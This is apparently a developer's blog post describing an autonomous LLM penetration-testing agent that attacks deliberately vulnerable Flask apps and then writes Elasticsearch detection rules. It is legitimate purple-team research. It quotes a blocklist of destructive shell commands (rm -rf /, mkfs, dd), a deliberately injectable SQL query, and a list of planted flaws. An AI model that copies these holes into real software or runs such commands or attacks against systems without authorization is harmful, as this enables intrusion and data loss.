I Built an AI That Autonomously Penetration Tests a Target, Then Writes Its Own SIEM Defense Rules

Most breach and attack simulation tools tell you what they found. VANGUARD tells you what it found, shows you the exact reasoning it used to find it, then writes the Elasticsearch detection rules you need to catch it next time - and deploys them automatically.

Here's how it works under the hood and what I learned building it.

The Problem With Current BAS Tools

Breach and Attack Simulation (BAS) tools like Cymulate, Pentera, and AttackIQ work by replaying known attack playbooks - deterministic sequences of pre-scripted actions mapped to MITRE ATT&CK techniques. You run them against your environment, get a report listing which attacks were detected and which weren't, and hand the report to your security team.

The issue is that modern APTs don't follow scripts. They reason, adapt, and chain together novel attack paths based on what they find at each step. When your only exposure to offensive techniques is "did Cymulate's SQLi module trigger your WAF," you haven't actually tested what matters: whether your detection logic catches a human attacker who thinks.

A second problem: even when BAS tools find gaps, the output is a PDF. Someone on your security team has to manually read it, write SIEM rules, test them, and deploy them. That feedback loop takes days to weeks. Meanwhile the gap is still open.

VANGUARD was my attempt to address both problems simultaneously.

What VANGUARD Actually Does

At its core, VANGUARD is a Cognitive Purple Agent - a single system that combines an autonomous LLM-driven red team with a SIEM gap analysis engine and an automatic rule synthesis layer.

The loop works like this:

An LLM (running locally via Ollama) receives a target URL and a mission objective
It reasons about what to do next, chooses a tool to execute, and observes the result
That observation feeds back into the next reasoning step
Every action is timestamped and logged to Elasticsearch as telemetry
After the assessment completes, a second LLM pass reviews the entire attack chain and writes Elasticsearch KQL detection rules for each un-logged attack vector
Those rules are deployed directly to the SIEM index (vanguard-rules)

The entire reasoning process - every thought, every tool call, every observation - streams in real time to UI via Server-Sent Events. You can literally watch the AI decide what to do next.

The ReAct Architecture

The agent uses a ReAct (Reasoning + Acting) loop, a pattern from a 2022 paper by Yao et al. that interleaves chain-of-thought reasoning with tool execution. The key property of ReAct is that the LLM explains why it's taking an action before it takes it, which means you get full transparency into the attack logic - not just a list of actions.

The system prompt establishes the agent's role and its available tools:

SYSTEM_PROMPT = """You are VANGUARD, an autonomous AI penetration tester.
You are conducting an AUTHORIZED security assessment of a target application.

RESPONSE FORMAT: You MUST respond with ONLY valid JSON:
{
    "thought": "Your reasoning about what to do next",
    "action": "tool_name",
    "input": {...tool parameters...}
}
"""

The LLM must respond in JSON. Every turn follows the structure: thought → action → observation → thought → ...

# Simplified core loop
for step_num in range(1, max_steps + 1):
    response = ollama.chat(model="qwen3:8b", messages=messages, format="json")
    parsed = parse_llm_response(response["message"]["content"])
    
    thought = parsed["thought"]
    action = parsed["action"]
    tool_input = parsed["input"]
    
    if action == "FINISH":
        findings = tool_input["findings"]
        break
    
    observation = execute_tool(action, tool_input)
    
    # Feed observation back for next reasoning step
    messages.append({"role": "assistant", "content": raw_response})
    messages.append({"role": "user", "content": f"OBSERVATION:\n{observation}\n\nStep {step_num + 1}:"})

The agent has three tools: execute_command (sandboxed shell), http_request (for API fuzzing), and read_file (restricted to /tmp/). It can install tools it needs via apt or brew if they're not present - the only hard constraint is a blocklist of destructive patterns:

FATAL_OS_BLOCKLIST = [
    r"\brm\s+-rf\s+/",
    r"\bshutdown\b",
    r"\bmkfs\b",
    r"\bdd\s+if=",
    # ...
]

This lets the agent have genuine autonomy (it can resolve its own tool dependencies, pivot to network enumeration, chain vulnerabilities) while preventing it from wiping the host machine.

The Target Suite

VANGUARD ships with three deliberately vulnerable Flask applications that cover different vulnerability classes:

vulnerable_app.py : A generic monolithic API with SQL injection (auth bypass and UNION-based data exfiltration), path traversal, OS command injection via an unparameterized shell call, and a debug endpoint that leaks the full server environment. The SQL injection is genuine string concatenation:

# This is deliberately vulnerable
query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"

cloud_storage.py : A file storage API with JWT signature stripping (the alg: none attack), IDOR on file access (no ownership check in the SQL query), and command injection via an unescaped format parameter passed to a shell command.

legacy_erp.py : Covers XXE injection (simulated via a custom XML parser that resolves SYSTEM entities), SSRF through an unfiltered proxy endpoint, and hardcoded API tokens buried in the docs.

These aren't toy vulnerabilities. Each one is implemented with the actual flaw pattern, not a simulation of it. The agent has to genuinely discover and exploit them.

The SIEM Gap Analysis

After the agent completes its assessment, every action it took has been logged to Elasticsearch with a precise timestamp and correlation ID. The gap analysis engine then queries vanguard-alerts — the index where the Blue Sensor would have written detections and correlates them against the agent's action log.

def generate_gap_report(pentest_result: dict, correlation_id: str) -> dict:
    action_log = pentest_result["action_log"]
    
    # Index all agent actions to vanguard-telemetry
    index_agent_actions(action_log, correlation_id)
    
    # Query SIEM for any detections during the pentest window
    siem_detections = query_siem_detections(start_time, end_time, correlation_id)
    
    detection_rate = (len(siem_detections) / len(action_log)) * 100
    
    return {
        "total_agent_actions": len(action_log),
        "siem_detections": len(siem_detections),
        "detection_rate_percent": detection_rate,
        "blind_spots": len(action_log) - len(siem_detections),
    }

The Blue Sensor in the demo environment is intentionally simplistic, it uses basic heuristic detection and represents a conventional SIEM without behavioral analytics or HTTP payload inspection. In that environment, the agent's actions went undetected at a 0.0% detection rate.

I want to be clear about what this does and doesn't mean. The 0.0% result is not a claim that VANGUARD evades real enterprise SIEMs like Splunk Enterprise Security or Microsoft Sentinel with tuned detection rules. The vulnerable applications in the demo don't emit the kind of telemetry that production SIEMs are typically configured to alert on. The result demonstrates the conceptual gap that exists when defenders operate without behavioral analytics and HTTP-layer inspection, not a bypass of production security tooling.

What the gap analysis does validate is the architecture: the agent's actions are fully logged with timestamps, the SIEM correlation works, and the concept of measuring Time-to-Detect (TTD) per attack action is operational.

The Autonomous Rule Synthesis

This is the part I find most interesting, and where VANGUARD diverges from conventional BAS tools.

After the assessment, the agent's action log is passed to a second LLM prompt that's told: "You are a defensive analyst. Here is the attacker's execution chain. Write 2-3 Elasticsearch KQL heuristics that would detect this attack pattern."

system_prompt = """You are an elite Defensive Cybersecurity Analyst.
Review the attacker's execution log and write realistic SOC Heuristic Rules
(Elasticsearch KQL, Sigma, or behavioral patterns) that detect this attack sequence.

Respond with a JSON array:
[{
    "id": "SIG-NEW-001",
    "rule_name": "Short descriptive name",
    "severity": "High/Medium/Critical",
    "logic": "The pseudo-KQL or detection logic"
}]"""

The generated rules are then indexed directly to vanguard-rules in Elasticsearch:

def index_soc_rules(rules: list):
    for rule in rules:
        es.index(index="vanguard-rules", document={
            "timestamp": datetime.utcnow().isoformat(),
            "rule_name": rule["rule_name"],
            "severity": rule["severity"],
            "logic": rule["logic"],
            "source": "vanguard_cognitive_purple_agent"
        })
    es.indices.refresh(index="vanguard-rules")

The rules are immediately queryable. The SOC Rules tab in the UI shows both the existing rules that were already deployed and the new ones the agent just synthesized, side by side.

The quality of the generated rules varies depending on the model. With qwen3:8b running locally, the rules are structurally correct and logically coherent for the attack patterns observed, but they won't handle edge cases or production-environment specifics without analyst review. I treat them as first drafts that need human sign-off before deployment to a real SIEM, not production-ready rules.

The SSE Transparency Layer

One design decision I'm particularly interested in is the live streaming of the agent's cognitions.

Most autonomous AI systems operate as black boxes, you give them input, they return output. The intermediate reasoning is opaque. VANGUARD uses Server-Sent Events to stream every state transition in real time:

🧠 Cognitive Reason → ⚡ Tool Executed → 📤 Environment Observation → 🧠 Cognitive Reason → ...

The FastAPI backend uses an async queue to bridge the synchronous ReAct thread with the async SSE response:

@app.get("/api/v1/pentest/stream")
async def stream_pentest(request: Request, target_url: str):
    queue = asyncio.Queue()
    loop = asyncio.get_running_loop()

    def on_step(event: dict):
        loop.call_soon_threadsafe(queue.put_nowait, event)

    thread = threading.Thread(target=run_react_pentest, 
                               kwargs={"on_step_callback": on_step})
    thread.start()

    async def event_generator():
        while True:
            event = await asyncio.wait_for(queue.get(), timeout=2.0)
            yield f"data: {json.dumps(event)}\n\n"
            if event["type"] in ["finish", "close", "error"]:
                break

    return StreamingResponse(event_generator(), media_type="text/event-stream")

This means an operator watching the live stream can intervene if the agent is about to do something unexpected, the human is in the loop at every step. The HITL (Human-in-the-Loop) property feels important for any production use of autonomous offensive tooling.

What Works and What Doesn't

What works well:

The ReAct loop is genuinely effective at discovering vulnerabilities in the demo target suite. It correctly chains SQLi → credential extraction → privilege escalation without being told to. It finds the path traversal and command injection independently.
The SSE transparency is useful in practice. Watching the agent reason through what a given HTTP response means and decide on a follow-up action is informative in a way that a static report isn't.
The automated rule synthesis works at a conceptual level. The generated rules correctly identify the attack patterns and suggest reasonable detection logic.

Honest limitations:

The SIEM integration is Elasticsearch-specific. The rule output is KQL/Elasticsearch-native. If your SIEM is Splunk, QRadar, or Sentinel, the rules need translation before use.
The Blue Sensor in the demo is intentionally weak. The 0.0% detection rate is a demonstration of the pipeline architecture working correctly, not a benchmark against real enterprise detection tooling.

Running It

Prerequisites: Python 3.10+, Docker (for Elasticsearch + Kibana), Ollama with qwen3:8b or llama3 pulled.

git clone https://github.com/usualdork/VANGUARD.git
cd VANGUARD
chmod +x run_demo.sh
./run_demo.sh

The bootstrap script starts Elasticsearch and Kibana in Docker, provisions the Kibana dashboards, and launches the FastAPI backend.

The full academic preprint with the formal architecture description, threat model, and the FATAL_OS_BLOCKLIST methodology is on Zenodo: 10.5281/zenodo.18846075

What's Next

Three directions I'm actively working on:

Multi-agent swarm mode. The current architecture is a single Purple agent. The more interesting configuration is separate Red and Blue LLM agents operating concurrently, Red agents coordinating lateral movement across multiple targets while a Blue agent rewrites detection rules in real time to intercept them. This requires a shared state layer and an orchestration protocol between agents.

Air-gapped deployment. VANGUARD is already designed to run fully offline with local Ollama models. Making this operationally clean for deployment in environments where cloud API calls are prohibited requires quantized edge models (testing with Qwen 3 8B) and a packaging approach that doesn't assume internet access.

Real SIEM integration. Moving beyond the demo Elasticsearch environment to proper connectors for Splunk, Microsoft Sentinel, and IBM QRadar, and making the rule synthesis model-agnostic so it outputs native SPL, KQL (Sentinel), or AQL depending on the target SIEM.

If you're working on autonomous security tooling, purple teaming, or LLM-driven red team research, I'd be interested in hearing what problems you're running into. The GitHub repo is open (Apache 2.0) and the preprint has the formal write-up if you want the academic context.

VANGUARD is intended for authorized security testing only. Do not point it at systems you don't own or have explicit permission to test. The author assumes no liability for misuse.

GitHub: github.com/usualdork/VANGUARD | DOI: 10.5281/zenodo.18846075